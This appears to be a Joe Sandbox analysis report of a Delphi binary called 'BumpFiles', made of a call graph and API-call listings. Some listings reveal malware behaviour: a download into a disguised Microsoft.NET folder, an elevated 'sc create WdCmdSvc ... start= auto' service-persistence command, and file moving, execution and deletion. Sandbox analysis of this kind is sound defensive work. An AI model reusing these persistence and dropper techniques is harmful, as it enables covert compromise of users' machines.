API calls 11810->11811 11811->11799 11813 4246e0 11812->11813 11814 424701 11813->11814 11843 423398 11813->11843 11814->11792 11817 40a80d 11816->11817 11821 40a814 11816->11821 11829 409d7c 11817->11829 11838 40a650 11821->11838 11823 40ed6d 11822->11823 11824 40ed8a 11822->11824 11825 40edc8 11823->11825 11827 40ed75 11823->11827 11824->11806 11824->11807 11842 40f114 MultiByteToWideChar 11825->11842 11841 40f114 MultiByteToWideChar 11827->11841 11830 409d90 11829->11830 11831 409d80 SysAllocStringLen 11829->11831 11830->11821 11831->11830 11832 409d74 11831->11832 11833 40a20f 11832->11833 11834 409ddc 11832->11834 11837 40a1ff SysReAllocStringLen 11832->11837 11833->11821 11835 409df0 11834->11835 11836 409de2 SysFreeString 11834->11836 11835->11821 11836->11835 11837->11832 11837->11833 11839 40a656 SysFreeString 11838->11839 11840 40a65c 11838->11840 11839->11840 11840->11803 11841->11824 11842->11824 11844 42aa4c 71 API calls 11843->11844 11845 4233b1 11844->11845 11846 409410 4 API calls 11845->11846 11847 4233b6 11846->11847 11847->11814 11849 639749 11848->11849 11870 63b124 11849->11870 11851 63982f 11876 60b774 11851->11876 11857 63986d 11931 42547c 11857->11931 11859 63989c 11860 42547c 5 API calls 11859->11860 11861 6398c6 11860->11861 11940 42d8fc 11861->11940 11863 6398d3 11864 639901 MoveFileW Sleep 11863->11864 11865 639926 11864->11865 11946 633bd8 11865->11946 11867 639942 11950 63586c Sleep WinExec Sleep 11867->11950 11869 639951 Sleep 11869->11771 11871 63b138 11870->11871 11951 4b5a8c 11871->11951 11873 63b185 11956 4b59a0 11873->11956 11875 63b1ce 11875->11851 11877 60b8e4 73 API calls 11876->11877 11880 60b78b 11877->11880 11878 60b79b 11879 4b5668 79 API calls 11878->11879 11881 60b7d4 11879->11881 11880->11878 11882 42a97c 46 API calls 11880->11882 11972 60b824 11881->11972 11884 60b7bf 11882->11884 11886 409410 4 API calls 11884->11886 11886->11878 11887 60c5bc 11888 60c5e4 11887->11888 11889 60c5cd 11887->11889 11890 60c603 
11888->11890 12063 60bdbc 11888->12063 11891 42a97c 46 API calls 11889->11891 11895 60b8e4 11890->11895 11892 60c5df 11891->11892 11894 409410 4 API calls 11892->11894 11894->11888 11898 60b901 11895->11898 11896 60bd01 11897 43eb70 71 API calls 11896->11897 11899 60bd23 11897->11899 11898->11896 11900 60b96c 11898->11900 11906 60bb82 11898->11906 11899->11857 11901 40b08c 16 API calls 11900->11901 11902 60b999 11901->11902 11903 43d0d8 50 API calls 11902->11903 11904 60b9a4 11903->11904 11907 40b34c 25 API calls 11904->11907 11905 60bc02 12250 609788 11905->12250 11906->11905 11908 40c0c0 25 API calls 11906->11908 11909 60b9c1 11907->11909 11908->11905 11910 40b34c 25 API calls 11909->11910 11912 60b9d2 11910->11912 11915 40b08c 16 API calls 11912->11915 11916 60b9ed 11915->11916 11916->11857 11918 609748 46 API calls 11919 60bc70 11918->11919 11920 609748 46 API calls 11919->11920 11921 60bc87 11920->11921 11922 609748 46 API calls 11921->11922 11923 60bc9e 11922->11923 11924 609788 46 API calls 11923->11924 11925 60bcb4 11924->11925 11926 609788 46 API calls 11925->11926 11927 60bcca 11926->11927 11928 609748 46 API calls 11927->11928 11929 60bce1 11928->11929 11929->11896 12258 6096d0 11929->12258 11932 40a8a4 11931->11932 11933 425489 DeleteFileW 11932->11933 11934 4254d1 11933->11934 11935 42549b GetLastError GetFileAttributesW 11933->11935 11934->11859 11936 4254cb SetLastError 11935->11936 11937 4254ad 11935->11937 11936->11934 11937->11936 11938 4254b6 11937->11938 11939 4254bd RemoveDirectoryW 11938->11939 11939->11934 11941 42d911 11940->11941 11942 42d922 GetEnvironmentVariableW 11941->11942 11943 42d934 11942->11943 11944 42d941 11942->11944 11943->11863 11945 42d953 GetEnvironmentVariableW 11944->11945 11945->11943 11947 633bef 11946->11947 11948 633c23 ShellExecuteW 11947->11948 11949 633c4f 11948->11949 11949->11867 11950->11869 11952 4b5668 79 API calls 11951->11952 11953 4b5aa3 11952->11953 11959 4b5a3c 11953->11959 11955 4b5abe 11955->11873 11957 
4b5668 79 API calls 11956->11957 11958 4b59ba 11957->11958 11958->11875 11960 4b5a50 11959->11960 11961 4b5a86 11960->11961 11963 4b3e00 11960->11963 11961->11955 11964 4b3e1d 11963->11964 11966 42a97c 46 API calls 11964->11966 11970 4b3e3a 11964->11970 11965 4b3e75 11965->11961 11967 4b3e35 11966->11967 11968 409410 4 API calls 11967->11968 11968->11970 11969 42a97c 46 API calls 11969->11970 11970->11965 11970->11969 11971 409410 4 API calls 11970->11971 11971->11970 11973 60b8e4 73 API calls 11972->11973 11974 60b83a 11973->11974 11975 42a97c 46 API calls 11974->11975 11980 60b855 11974->11980 11976 60b850 11975->11976 11977 409410 4 API calls 11976->11977 11977->11980 11978 60b881 11979 60b7f1 11978->11979 11985 60a5c0 11978->11985 11979->11887 11980->11978 11982 42a97c 46 API calls 11980->11982 11983 60b87c 11982->11983 11984 409410 4 API calls 11983->11984 11984->11978 11986 60a5d9 11985->11986 12005 43eb70 11986->12005 11989 60a82b 11992 40b08c 16 API calls 11989->11992 11991 60a611 11994 42a97c 46 API calls 11991->11994 12001 60a62c 11991->12001 11993 60a846 11992->11993 11993->11979 11995 60a627 11994->11995 11996 409410 4 API calls 11995->11996 11996->12001 11997 42a97c 46 API calls 11997->12001 11998 409410 4 API calls 11998->12001 11999 609694 46 API calls 11999->12001 12000 609658 46 API calls 12000->12001 12001->11989 12001->11997 12001->11998 12001->11999 12001->12000 12002 40c0c0 25 API calls 12001->12002 12003 6095e0 46 API calls 12001->12003 12018 43eab8 12001->12018 12002->12001 12003->12001 12023 4410f0 12005->12023 12010 60b0ac 12011 60b0d9 12010->12011 12012 40c0c0 25 API calls 12011->12012 12014 60b11b 12012->12014 12013 60b312 12013->11991 12014->12013 12016 60b29c 12014->12016 12042 6095e0 12014->12042 12016->12013 12017 40c0c0 25 API calls 12016->12017 12017->12013 12046 43fcbc 12018->12046 12020 43eacf 12021 40b8f8 25 API calls 12020->12021 12022 43eafa 12021->12022 12022->12001 12024 441112 12023->12024 12025 4410fb 12023->12025 12028 
441131 12024->12028 12030 440f44 25 API calls 12024->12030 12026 42a97c 46 API calls 12025->12026 12027 44110d 12026->12027 12029 409410 4 API calls 12027->12029 12031 43eb7c 12028->12031 12036 43f238 12028->12036 12029->12024 12030->12028 12033 440f44 12031->12033 12034 40be18 25 API calls 12033->12034 12035 43eb85 12034->12035 12035->11989 12035->12010 12037 43f250 12036->12037 12038 42a97c 46 API calls 12037->12038 12041 43f282 12037->12041 12039 43f27d 12038->12039 12040 409410 4 API calls 12039->12040 12040->12041 12041->12031 12043 6095f5 12042->12043 12044 42a97c 46 API calls 12043->12044 12045 609628 12043->12045 12044->12045 12045->12014 12047 43fccc 12046->12047 12048 43fcd5 12047->12048 12049 43fcdf 12047->12049 12054 43fc7c 12048->12054 12051 43fce8 12049->12051 12060 42a83c 12049->12060 12051->12020 12056 43fc90 12054->12056 12055 43fc9b 12058 440f44 25 API calls 12055->12058 12056->12055 12057 42a83c 4 API calls 12056->12057 12057->12056 12059 43fcb8 12058->12059 12059->12020 12061 409410 4 API calls 12060->12061 12062 42a846 12061->12062 12062->12051 12064 60be07 12063->12064 12065 40b08c 16 API calls 12064->12065 12066 60be86 12065->12066 12093 60ca14 12066->12093 12069 40b34c 25 API calls 12070 60beb5 12069->12070 12111 60b5cc 12070->12111 12072 60bedd 12073 60bee5 12072->12073 12074 60bf6c 12072->12074 12076 40b08c 16 API calls 12073->12076 12126 42c1dc 12074->12126 12078 60bf0a 12076->12078 12077 60bf8d 12082 60bfa1 12077->12082 12083 60bfeb 12077->12083 12079 43d0d8 50 API calls 12078->12079 12080 60bf18 12079->12080 12081 40b34c 25 API calls 12080->12081 12084 60bf38 12081->12084 12139 4fb5e8 12082->12139 12089 4fb5e8 50 API calls 12083->12089 12117 609f84 12084->12117 12087 60bfc3 12087->11888 12088 60bf49 12090 40b08c 16 API calls 12088->12090 12092 60c02a 12089->12092 12091 60bf64 12090->12091 12091->11888 12092->11888 12094 60ca40 12093->12094 12095 60ca8d 12094->12095 12096 42a97c 46 API calls 12094->12096 12098 60cab8 12095->12098 12099 
42a97c 46 API calls 12095->12099 12097 60ca88 12096->12097 12100 409410 4 API calls 12097->12100 12103 40b08c 16 API calls 12098->12103 12101 60cab3 12099->12101 12100->12095 12102 409410 4 API calls 12101->12102 12102->12098 12104 60cb1e 12103->12104 12105 43d0d8 50 API calls 12104->12105 12106 60cb29 12105->12106 12107 40b34c 25 API calls 12106->12107 12108 60cb46 12107->12108 12109 40b08c 16 API calls 12108->12109 12110 60be9e 12109->12110 12110->12069 12113 60b5e6 12111->12113 12112 60b67e 12112->12072 12113->12112 12151 431b00 12113->12151 12115 60b673 12155 431938 12115->12155 12118 609fa0 12117->12118 12119 609fc3 12118->12119 12120 609fb4 12118->12120 12122 431828 52 API calls 12119->12122 12211 431828 12120->12211 12123 609fbe 12122->12123 12124 431938 71 API calls 12123->12124 12125 60a00a 12124->12125 12125->12088 12127 42c215 12126->12127 12132 42c2a0 12127->12132 12138 42c235 12127->12138 12217 423884 12127->12217 12131 42c26d 12131->12132 12133 423884 CharUpperBuffW 12131->12133 12134 42c38a 12132->12134 12137 42c2f8 12132->12137 12133->12132 12136 40c0c0 25 API calls 12134->12136 12134->12138 12136->12134 12137->12138 12225 42f984 12137->12225 12138->12077 12142 4fb620 12139->12142 12146 4fb612 12139->12146 12140 4fb680 12241 4fc074 12140->12241 12142->12140 12143 42a97c 46 API calls 12142->12143 12145 4fb65c 12142->12145 12142->12146 12144 4fb657 12143->12144 12147 409410 4 API calls 12144->12147 12145->12140 12148 42a97c 46 API calls 12145->12148 12146->12087 12147->12145 12149 4fb67b 12148->12149 12150 409410 4 API calls 12149->12150 12150->12140 12152 431b09 12151->12152 12153 431b15 12151->12153 12179 431f14 12152->12179 12153->12115 12157 431955 12155->12157 12156 431979 12158 4319a1 12156->12158 12160 42aa4c 71 API calls 12156->12160 12157->12156 12159 42a97c 46 API calls 12157->12159 12161 4319c9 12158->12161 12164 42aa4c 71 API calls 12158->12164 12162 431974 12159->12162 12163 43199c 12160->12163 12165 4319fe 12161->12165 12169 42aa4c 71 
API calls 12161->12169 12166 409410 4 API calls 12162->12166 12167 409410 4 API calls 12163->12167 12168 4319c4 12164->12168 12193 4311e8 12165->12193 12166->12156 12167->12158 12171 409410 4 API calls 12168->12171 12172 4319f9 12169->12172 12171->12161 12174 409410 4 API calls 12172->12174 12174->12165 12175 42a97c 46 API calls 12177 431a28 12175->12177 12176 431a2d 12176->12112 12178 409410 4 API calls 12177->12178 12178->12176 12180 431f1a 12179->12180 12183 431bfc 12180->12183 12182 431f38 12182->12153 12184 431c08 12183->12184 12185 431c22 12184->12185 12186 431c18 GetACP 12184->12186 12187 431c25 GetCPInfo 12185->12187 12186->12187 12188 431c42 12187->12188 12190 431c59 12187->12190 12189 42a97c 46 API calls 12188->12189 12191 431c54 12189->12191 12190->12182 12192 409410 4 API calls 12191->12192 12192->12190 12194 431214 12193->12194 12195 4311f9 12193->12195 12196 431241 12194->12196 12198 42aa4c 71 API calls 12194->12198 12195->12194 12197 42a97c 46 API calls 12195->12197 12201 42aa4c 71 API calls 12196->12201 12202 431269 12196->12202 12199 43120f 12197->12199 12200 43123c 12198->12200 12204 409410 4 API calls 12199->12204 12205 409410 4 API calls 12200->12205 12206 431264 12201->12206 12203 43129f 12202->12203 12207 42aa4c 71 API calls 12202->12207 12203->12175 12203->12176 12204->12194 12205->12196 12208 409410 4 API calls 12206->12208 12209 43129a 12207->12209 12208->12202 12210 409410 4 API calls 12209->12210 12210->12203 12212 431842 12211->12212 12213 431832 12211->12213 12212->12123 12214 431f14 52 API calls 12213->12214 12216 431840 12213->12216 12215 431875 12214->12215 12215->12123 12216->12123 12219 423893 12217->12219 12218 4238b4 12221 4238b8 12218->12221 12219->12218 12220 4238ae CharUpperBuffW 12219->12220 12220->12218 12222 4238c5 12221->12222 12223 4238f0 12222->12223 12224 4238ea CharLowerBuffW 12222->12224 12223->12131 12224->12223 12228 42fb00 12225->12228 12231 42f9a8 12228->12231 12232 42f9d3 12231->12232 12233 42f9ba 12231->12233 
12235 42fa5c CompareStringW 12232->12235 12237 42fa5c 12233->12237 12236 42f9a1 12235->12236 12236->12137 12238 42fa75 12237->12238 12239 42facf CompareStringW 12238->12239 12240 42fa97 12238->12240 12239->12240 12240->12236 12244 4fbb44 12241->12244 12243 4fc07b 12243->12146 12245 4fbb58 12244->12245 12249 4fbb82 12244->12249 12246 42a97c 46 API calls 12245->12246 12245->12249 12247 4fbb7d 12246->12247 12248 409410 4 API calls 12247->12248 12248->12249 12249->12243 12251 6097a1 12250->12251 12252 6097ba 12251->12252 12253 42a97c 46 API calls 12251->12253 12254 609748 12252->12254 12253->12252 12255 609762 12254->12255 12256 42a97c 46 API calls 12255->12256 12257 60977b 12255->12257 12256->12257 12257->11918 12259 6096e5 12258->12259 12260 609719 12259->12260 12261 42a97c 46 API calls 12259->12261 12260->11896 12261->12260 12269 4071f0 12262->12269 12264 5eeafc 12264->11776 12266 5edfbe 12265->12266 12268 5edfcb 12266->12268 12274 5edea4 PeekMessageW 12266->12274 12268->11782 12270 407204 12269->12270 12271 407226 GetCommandLineW 12270->12271 12272 407208 GetModuleFileNameW 12270->12272 12273 407224 12271->12273 12272->12273 12273->12264 12275 5edec5 12274->12275 12280 5edfa6 12274->12280 12276 5edecb IsWindowUnicode 12275->12276 12277 5eded5 12275->12277 12276->12277 12278 5edefc PeekMessageA 12277->12278 12279 5edee6 PeekMessageW 12277->12279 12281 5edf10 12278->12281 12279->12281 12280->12266 12281->12280 12295 5efd40 GetCapture 12281->12295 12283 5edf4b 12283->12280 12302 5edd38 12283->12302 12292 5edf89 TranslateMessage 12293 5edf9e DispatchMessageA 12292->12293 12294 5edf96 DispatchMessageW 12292->12294 12293->12280 12294->12280 12296 5efd55 12295->12296 12297 5efd66 12295->12297 12296->12297 12330 532154 12296->12330 12297->12283 12299 5efd77 GetParent 12299->12297 12301 5efd71 12299->12301 12300 532154 7 API calls 12300->12301 12301->12297 12301->12299 12301->12300 12303 5edd63 12302->12303 12304 5edd4c 12302->12304 12303->12280 12306 5edbf0 12303->12306 
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction ID: d95ccfb9285443909eeab24cd5826697557166218ec92875eff56e639bb6d067
                                                                    • Opcode Fuzzy Hash: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction Fuzzy Hash: 06F08271904644AECB50FBB5CC9299EB7ACEF483187E045B7B404F22D2EA3CAF14995D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D22D,?,?), ref: 0040D041
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D08A
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D0AC
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D0CA
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D0E8
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D106
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D124
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D), ref: 0040D164
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001), ref: 0040D18F
                                                                    • RegCloseKey.ADVAPI32(?,0040D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales), ref: 0040D20A
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction ID: 96a9666c888c6573c04f77d76a58949e2d0052d2a9ed3862a85dc5018720b54c
                                                                    • Opcode Fuzzy Hash: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction Fuzzy Hash: C5510275E80608BFEB10EAD5CC46FAF73BCEB58704F5044BABA04F61C1D6789A448A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108FC
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: Lld$lld
                                                                    • API String ID: 3997070919-3762902296
                                                                    • Opcode ID: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction ID: 3f85bfe050b3ea984b5aeb894ecb8602a3e2b9af0aebbdfc5bfded10294532e9
                                                                    • Opcode Fuzzy Hash: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction Fuzzy Hash: 14A17DB5A003099FDB14CFE8D890BEEB7B5BF59314F14412AE505AB381DBB8A9C4CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000,00000000), ref: 0040CCF2
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD16
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD25
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD37
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD94
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CDBD
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-GB,en,en-US,
                                                                    • API String ID: 975949045-3021119265
                                                                    • Opcode ID: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction ID: 257e64961a288cd264a0ffaab5fede5390936cc15f122fe2aa70ea45eab53adf
                                                                    • Opcode Fuzzy Hash: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction Fuzzy Hash: C021A1207C0700ABD710B7BA8C8276E359A9F46705F50853FB400BA2D3CA7D8C4597AE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • IsUserAnAdmin.SHELL32 ref: 00633424
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006334A4
                                                                      • Part of subcall function 00424F1C: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
                                                                      • Part of subcall function 004258EC: CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                      • Part of subcall function 00633A38: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    • FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB, xrefs: 00633467
                                                                    • C:\Program Files (x86)\Microsoft.NET\base, xrefs: 00633441, 0063344F
                                                                    • C:\Program Files (x86)\Microsoft.NET\fuge.zip, xrefs: 00633474
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
                                                                    • String ID: C:\Program Files (x86)\Microsoft.NET\base$C:\Program Files (x86)\Microsoft.NET\fuge.zip$FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB
                                                                    • API String ID: 3215071381-4060426360
                                                                    • Opcode ID: 843a8cac7f2f9cc8efd0aa34ab3001c845b0e3ab361ee83c73bc81c2c7516f43
                                                                    • Instruction ID: 8dad2de6a8b3dea3eefc5337c2ac44f97f3349aa0d5aad20445da69dd7c69d86
                                                                    • Opcode Fuzzy Hash: 843a8cac7f2f9cc8efd0aa34ab3001c845b0e3ab361ee83c73bc81c2c7516f43
                                                                    • Instruction Fuzzy Hash: 9811B670600714AFD711FF61DD52ADE73EADB48304F90446AF401A7393DA39AF0187A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a6815cf048d2a75c8910397385a2ca880fdec26ab6423f402ba9e5d1119bb45e
                                                                    • Instruction ID: 11846b2a77938f10269bbea534853d16cf35a90d37f20fdb129f70d6c98cb005
                                                                    • Opcode Fuzzy Hash: a6815cf048d2a75c8910397385a2ca880fdec26ab6423f402ba9e5d1119bb45e
                                                                    • Instruction Fuzzy Hash: 2E71B035604A008BD715DB29C888B17BBD5EF86314F18C1BFE888AB3D2D6B89C41DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas$:c
                                                                    • API String ID: 587946157-4108604376
                                                                    • Opcode ID: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction ID: 319b91e3220b3ab50859801b3322155d411d05b55362160aac4d9e6ad888e803
                                                                    • Opcode Fuzzy Hash: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction Fuzzy Hash: E7F0C230684314BFE701EB95CD83F9DFBBAEB45B10FA2007AB500B27C1D6786B108659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A1F
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A35
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A63
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction ID: bdf7a1556342557ed6c5260c20dac2f68fef6da929d48900eeb6b1868b291bfe
                                                                    • Opcode Fuzzy Hash: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction Fuzzy Hash: CEC11476605B118BD715CF29E884317BBA2EB86310F1882BFD459AF3D5C3B4A881CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                    • Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
